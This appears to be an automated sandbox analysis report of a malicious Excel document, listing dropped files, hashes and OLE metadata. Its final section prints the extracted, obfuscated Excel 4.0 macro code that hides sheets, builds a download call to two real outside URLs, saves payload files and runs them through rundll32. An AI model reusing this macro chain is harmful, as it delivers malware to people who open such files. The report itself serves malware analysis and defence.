                                                                              Category:modified
                                                                              Size (bytes):252
                                                                              Entropy (8bit):2.9725205059056137
                                                                              Encrypted:false
                                                                              SSDEEP:3:kkFklxb8vfllXlE/2S+HDHllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1yR57d3:kK8+HDXliBAIdQZV7QvB
                                                                              MD5:1F793405F9FC9C81BBC7F99C7F5A8BDF
                                                                              SHA1:840F15829F9F926B3164AB9E8CBE2DFFDD519A37
                                                                              SHA-256:9E8D613136A5D033EEA184928671C325E5599AEB9D4B5BBB97AADA7BE3E6D38B
                                                                              SHA-512:08F1BC737857FA50D090FAD3297D8B54985FA61B97E190A0B3456EE4865DF097A0DCF6CEC56BDAA86B41CED1A291F826EE2CC51ABF2F2F3D318014684A49CE7F
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview: p...... ....`....p.Hm..(....................................................... ........S`..b......(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.c.4.d.2.e.5.9.c.f.b.8.0."...
                                                                              C:\Users\user\AppData\Local\Temp\BACE0000
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):83002
                                                                              Entropy (8bit):7.898463614612142
                                                                              Encrypted:false
                                                                              SSDEEP:1536:oAGiMCBgFqO57Lav5F/U2SiwFNNWJsRE5vxjTIJv3R7:o04qO5PWzUWwhWISHIJv3R7
                                                                              MD5:95886F5C23351447BEE438643BB47432
                                                                              SHA1:E883CB7D47EDA8D717A9E5BEFBE2FC07A5466A48
                                                                              SHA-256:133BED2878DC1421701EFD5F935ECA31E278507D75D2C629A2349DC39CCAAC6F
                                                                              SHA-512:B1EA92BD35BA10F463F813DB2CB977E6818D8E87DCAA470F8B3573D6DD3FA6F85A41F54C05E81357D17E8CD84FD68BB960098E496AAA7DADACFD11B5107A26FC
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview: .U.n.0....?......(..r.izL.$...\K....I..V..p,;....vfvH...+k.G...k.Y3a.8.v].~.......pJ..ek@v1..iz....U;lY.R..9......p4...D...A..O&....Ku..l6....`Ru....v...|..Z&B0Z.DB..S;$._,....%..C....H.4!jb.w..5.........6k...+"..)..9..Pei.{......C.y....0j....ZXr.....q9.~....fZ.a%.4.......s.4'.{Vx..T"/..#(..$../wR.Gt...Zqs..m.../.k......~.]...x..}=........~N.:..1.^DPw.b.{w..b..PQ<e.|xx....!^.....R,G8...D..u .I.6..%....t...|h(P{.y9.f........PK..........!.[:..............[Content_Types].xml ...(................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\CabD3B5.tmp
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:Microsoft Cabinet archive data, 61020 bytes, 1 file
                                                                              Category:dropped
                                                                              Size (bytes):61020
                                                                              Entropy (8bit):7.994886945086499
                                                                              Encrypted:true
                                                                              SSDEEP:1536:IZ/FdeYPeFusuQszEfL0/NfXfdl5lNQbGxO4EBJE:0tdeYPiuWAVtlLBGm
                                                                              MD5:2902DE11E30DCC620B184E3BB0F0C1CB
                                                                              SHA1:5D11D14A2558801A2688DC2D6DFAD39AC294F222
                                                                              SHA-256:E6A7F1F8810E46A736E80EE5AC6187690F28F4D5D35D130D410E20084B2C1544
                                                                              SHA-512:EFD415CDE25B827AC2A7CA4D6486CE3A43CDCC1C31D3A94FD7944681AA3E83A4966625BF2E6770581C4B59D05E35FF9318D9ADADDADE9070F131076892AF2FA0
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview: MSCF....\.......,...................I........l.........R.q .authroot.stl.N....5..CK..8T....c_.d....A.K....=.D.eWI..r."Y...."i..,.=.l.D.....3...3WW.......y...9..w..D.yM10....`.0.e.._.'..a0xN....)F.C..t.z.,.O20.1``L.....m?H..C..X>Oc..q.....%.!^v%<...O...-..@/.......H.J.W...... T...Fp..2.|$....._Y..Y`&..s.1........s.{..,.":o}9.......%._.xW*S.K..4"9......q.G:.........a.H.y.. ..r...q./6.p.;.`=*.Dwj......!......s).B..y.......A.!W.........D!s0..!"X...l.....D0...........Ba...Z.0.o..l.3.v..W1F hSp.S)@.....'Z..QW...G...G.G.y+.x...aa`.3..X&4E..N...._O..<X.......K...xm..+M...O.H...)..........*..o..~4.6.......p.`Bt.(..*V.N.!.p.C>..%.ySXY.>.`..f|.*...'^K`\..e......j/..|..)..&i...wEj.w...o..r<.$.....C.....}.x...L..&..).r..\...>....v........7...^..L!.$..'m...*,*.....7F$..~..S.6$S.-y....|.!.....x...~k...Q/.w.e...h.[...9<x...Q.x.][}*_%Z..K.).3..'....M.6QkJ.N........Y..Q.n.[.(.... ...Bg..33..[...S..[... .Z..<i.-.]...po.k.,...X6......y3^.t[.Dw.]ts. R..L..`..ut_F....
                                                                              C:\Users\user\AppData\Local\Temp\TarD3B6.tmp
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):158974
                                                                              Entropy (8bit):6.311775051607851
                                                                              Encrypted:false
                                                                              SSDEEP:1536:ilqXley2pR737/99UF210gNucQodv+1//dMrYJntYyjCQx7s2t6OGP:iQXipR7O/gNuc/v+lXjCQ7sO0
                                                                              MD5:E4731F8A3E7352DBA44EC7D3DD15BAEA
                                                                              SHA1:D5CA0025FBD356DEB8EDE35001F93039625562A5
                                                                              SHA-256:6C78EF77ACEF978321CCD30EE126FB7D30285BC186DDBDBE8B3E8F6E69D01353
                                                                              SHA-512:E68BA11A73E28404A274F0EE4ECC97A8BEFEDB91A20BDC5B00C72AE8928DD63924E351BE8A88E40960D54CE07E21EA21710DB0DFA00A5558C4264490E27B6988
                                                                              Malicious:false
                                                                              Preview: 0..l...*.H.........l.0..l....1.0...`.H.e......0..\...+.....7.....\.0..\.0...+.....7........_.T.....210611210413Z0...+......0..\.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sun May 30 23:40:37 2021, atime=Sun May 30 23:40:37 2021, length=16384, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):867
                                                                              Entropy (8bit):4.47188861989318
                                                                              Encrypted:false
                                                                              SSDEEP:12:85QapSLgXg/XAlCPCHaXgzB8IB/YOUpvX+Wnicvb483+bDtZ3YilMMEpxRljKMTg:85BW/XTwz6I+OeYe7CDv3qBrNru/
                                                                              MD5:F6CB0636A61B6677DB175EAB2729313C
                                                                              SHA1:CD6C7366FEE018D85A9E30EFE4C3C07C78D1F7D0
                                                                              SHA-256:C22D9BCFD7B727AB047457EF656C6D998921191BAA002702A3131D31CC6F811E
                                                                              SHA-512:5A65C2E0258F6328C477D340D1022F93C6256B4241E53AD47C1432087758C139E6839EEDA7A0E7A2C0EA5A265F6D4B21BCA3BB3F1A88114066B209D87A6D6221
                                                                              Malicious:false
                                                                              Preview: L..................F...........7G...3t.Hm...3t.Hm...@......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\927537\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......927537..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):113
                                                                              Entropy (8bit):4.71317481637129
                                                                              Encrypted:false
                                                                              SSDEEP:3:oyBVomMnUTWeS4UOytUTWeS4UmMnUTWeS4Uv:dj6nUTL8tUTLinUTLK
                                                                              MD5:827572951026F0F9437E31D866B8FF08
                                                                              SHA1:0B6A363D618B5E1D031EE6E5DCE5C18A9B13BBE6
                                                                              SHA-256:493A258224290D5C5BB92DC4C57E3B8E36D4BE213CC9F3744D69D345F03B843B
                                                                              SHA-512:F224FE824B181BEA88A282AFDD4528CF59F8952BD571C595AC6E6E3F2E7E9FA499B9E8FC5DE623B02501C0D341A82B3A7053B7550746CA36CDC6EBF1FBA662DB
                                                                              Malicious:false
                                                                              Preview: Desktop.LNK=0..[xls]..statistic-1496367785.LNK=0..statistic-1496367785.LNK=0..[xls]..statistic-1496367785.LNK=0..
                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\statistic-1496367785.LNK
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Sun May 30 23:40:37 2021, atime=Sun May 30 23:40:37 2021, length=173056, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):2128
                                                                              Entropy (8bit):4.526584572036177
                                                                              Encrypted:false
                                                                              SSDEEP:48:8tl/XT3IkdPWf2BQh2tl/XT3IkdPWf2BQ/:8r/XLIkVWf2BQh2r/XLIkVWf2BQ/
                                                                              MD5:EAE54A6709DFE2966EF10CC1E73A3345
                                                                              SHA1:3EB62EF39E7F1925E6AED8B9197596770CF6ADD1
                                                                              SHA-256:367542B6A9E110DD6525E6A474419B03BB4F9C790655EEF1A755110759F0EBD7
                                                                              SHA-512:BA3A506FA4B1271C9CC1BCE225AEB95D445227A4271EC300A2456A261A680BC69BF6AC2539C2EBAAF124390D666D7CC831322F000E787467E5AE77FEE2F0D09D
                                                                              Malicious:false
                                                                              Preview: L..................F.... ....I<..{...3t.Hm...>..Hm...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....z.2......R.. .STATIS~1.XLS..^.......Q.y.Q.y*...8.....................s.t.a.t.i.s.t.i.c.-.1.4.9.6.3.6.7.7.8.5...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\927537\Users.user\Desktop\statistic-1496367785.xls./.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.s.t.a.t.i.s.t.i.c.-.1.4.9.6.3.6.7.7.8.5...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......927537..........D_..
                                                                              C:\Users\user\Desktop\7BCE0000
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                              Category:dropped
                                                                              Size (bytes):199869
                                                                              Entropy (8bit):5.724666600105969
                                                                              Encrypted:false
                                                                              SSDEEP:6144:d8rmdAIByzElbSRg3WCbgBeP5NmPTdmsizCEadEudQ6KL8rmdAIByzElbSRg3WCX:cLEadnd+h
                                                                              MD5:7CEED140B26A2DDA4FCB7BD954F211CF
                                                                              SHA1:4D2AF9F747412365FBB0CB4C235AD669C67006A9
                                                                              SHA-256:7C074CAFC1D4A9E6EE817FDB3FBB247D0506EBD57D9FAE98A208A963F3BE1F5E
                                                                              SHA-512:FBC90CC3979309D02AE544AECDBAD10B5BA00FA920EA854CF03A1E36CC4A3A674418CD5DA0F551B7922FBE95D0D8B08881B02F764DAB7E15B359708985800CFA
                                                                              Malicious:false
                                                                              Preview: ........g2..........................\.p....user B.....a.........=...............................................=........K..8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.

                                                                              Static File Info

                                                                              General

                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: van-van, Last Saved By: Grog, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Fri May 21 09:07:02 2021, Security: 0
                                                                              Entropy (8bit):2.0857713013138395
                                                                              TrID:
                                                                              • Microsoft Excel sheet (30009/1) 78.94%
                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                              File name:statistic-1496367785.xls
                                                                              File size:536064
                                                                              MD5:7fb48e03b899f792be6c3118a46c5c8f
                                                                              SHA1:55445d13cd433121c6c2bfb31414b08e31e28a65
                                                                              SHA256:1c818433e1ca49729f987b3f060b2133c8375f8164181c4684600a278ee6033f
                                                                              SHA512:e950fe3278277996dbfb9f7f80bd03976793ba4967f272612f901eea83e1284a512104348ab14d3028dcac0ef9cd527dde9ce22323c90fa080fae3fcdc79905f
                                                                              SSDEEP:6144:C6tIrWqrY5O3NMHGRYc9u/YRTP85XbDu1XYiXxy:Ru1XPE
                                                                              File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                              File Icon

                                                                              Icon Hash:e4eea286a4b4bcb4

                                                                              Static OLE Info

                                                                              General

                                                                              Document Type:OLE
                                                                              Number of OLE Files:1

                                                                              OLE File "statistic-1496367785.xls"

                                                                              Indicators

                                                                              Has Summary Info:True
                                                                              Application Name:Microsoft Excel
                                                                              Encrypted Document:False
                                                                              Contains Word Document Stream:False
                                                                              Contains Workbook/Book Stream:True
                                                                              Contains PowerPoint Document Stream:False
                                                                              Contains Visio Document Stream:False
                                                                              Contains ObjectPool Stream:
                                                                              Flash Objects Count:
                                                                              Contains VBA Macros:False

                                                                              Summary

                                                                              Code Page:1251
                                                                              Author:van-van
                                                                              Last Saved By:Grog
                                                                              Create Time:2015-06-05 18:17:20
                                                                              Last Saved Time:2021-05-21 08:07:02
                                                                              Creating Application:Microsoft Excel
                                                                              Security:0

                                                                              Document Summary

                                                                              Document Code Page:1251
                                                                              Thumbnail Scaling Desired:False
                                                                              Contains Dirty Links:False

                                                                              Streams

                                                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                              General
                                                                              Stream Path:\x5DocumentSummaryInformation
                                                                              File Type:data
                                                                              Stream Size:4096
                                                                              Entropy:0.298297266065
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c 1 . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 4 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . . . . . . . E x c e l 4 . 0 M a c r o s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                              Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b8 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 74 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                                                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                              General
                                                                              Stream Path:\x5SummaryInformation
                                                                              File Type:data
                                                                              Stream Size:4096
                                                                              Entropy:0.277521975637
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v a n - v a n . . . . . . . . . G r o g . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . . . G . N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                              Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                                                              Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 521856
                                                                              General
                                                                              Stream Path:Book
                                                                              File Type:Applesoft BASIC program data, first line number 8
                                                                              Stream Size:521856
                                                                              Entropy:2.01072652781
                                                                              Base64 Encoded:True
                                                                              Data ASCII:. . . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . G r o g B . . . . . . . . . . . . . . . . . . . . . . . D o c 4 . . . . . . . . . . . . . . . . . . _ x l f n . A G G R E G A T E . . . . . . . . . . . . . . . . . . . . _ x l f n . F . I N V . R T . . . . ! . . . . .
                                                                              Data Raw:09 08 08 00 00 05 05 00 0a 54 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 04 47 72 6f 67 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                              Macro 4.0 Code

                                                                              ,,,"=WORKBOOK.HIDE(""Doc2"",1)",,,,,,"=WORKBOOK.HIDE(""Doc3"",1)",,,,,,"=WORKBOOK.HIDE(""Doc4"",1)",,,=BA17(),,,"=FORMULA(""U""&Doc2!BL28&Doc2!BL29&Doc2!BL30,Doc3!AY10)=RAND()=FACT(59)=FORMULA(Doc2!BJ39&before.4.4.52.sheet!BD17&Doc2!BJ43&Doc3!AY10&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc3!AY11&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc3!AY12&Doc2!BJ41&Doc2!BJ45&Doc2!BJ42&Doc2!BJ41&Doc3!AY13&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc2!BI24&Doc2!BJ41&Doc2!BJ45&Doc2!BJ45&Doc2!BJ44,Doc3!AW10)=SUMXMY2(452354,45245)",,,,,,"=FORMULA(Doc2!BJ39&before.4.4.52.sheet!BD17&Doc2!BJ43&Doc3!AY10&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc3!AY11&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc3!AY12&Doc2!BJ41&Doc2!BJ45&Doc2!BJ42&Doc2!BJ41&Doc3!AY14&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc2!BI24&""1""&Doc2!BJ41&Doc2!BJ45&Doc2!BJ45&Doc2!BJ44,Doc3!AW11)",,,,,,=GOTO(Doc3!AW8),,,"=FORMULA(""=""&Doc2!BG29&Doc2!BG36&Doc2!BG37&Doc2!BG38&Doc2!BG39&""2 ""&Doc2!BI24&Doc2!BG41&Doc2!BG42&Doc2!BG43&Doc2!BG44&Doc2!BG33,Doc3!AW14)",,,,,,"=FORMULA(""=""&Doc2!BG29&Doc2!BG36&Doc2!BG37&Doc2!BG38&Doc2!BG39&""2 ""&Doc2!BI24&""1""&Doc2!BG41&Doc2!BG42&Doc2!BG43&Doc2!BG44&Doc2!BG33,Doc3!AW15)",,,,,,,,,,,,=BD4(),,,,,,,,,,,,,,,,,,,,,CALL,,,"=FORMULA(Doc2!BH20&Doc2!BI20&Doc2!BJ20&Doc2!BK20,Doc3!AY13)",,,,,,"=FORMULA(""U""&Doc2!BL28&Doc2!BL32&Doc2!BJ31&Doc2!BL31&Doc2!BL34&Doc2!BJ32&""e""&""A"",Doc3!AY11)",,,,,,,,,,,,"=FORMULA(Doc2!BH21&Doc2!BI21&Doc2!BJ21&Doc2!BK21,Doc3!AY14)",,,,,,,,,,,,"=FORMULA(Doc2!BM34&Doc2!BM29&Doc2!BM30&Doc2!BM33,Doc3!AY12)",,,,,,=BG8(),,,,,,
                                                                              ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ht,tps://,psq.com.mx/hDHqOp5,8UBQv/filter.html,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ht,tps://,academy.haleemcampus.co,m/GxaCS5azoZlJ/filter.html,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\flamo.vir,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=,,,,,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,EXEC,,,0,,LM,JC,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,on,CB,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\bubl.cmi,,,wnl,,oadT,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Fil,,LDo,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,""")",,,,,,B,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,J,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"(""r",,,,0,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,un,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,3,,,=,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",Dl",,,"""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,lRegi,,,",",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ster,,,"(""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Server,,,),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,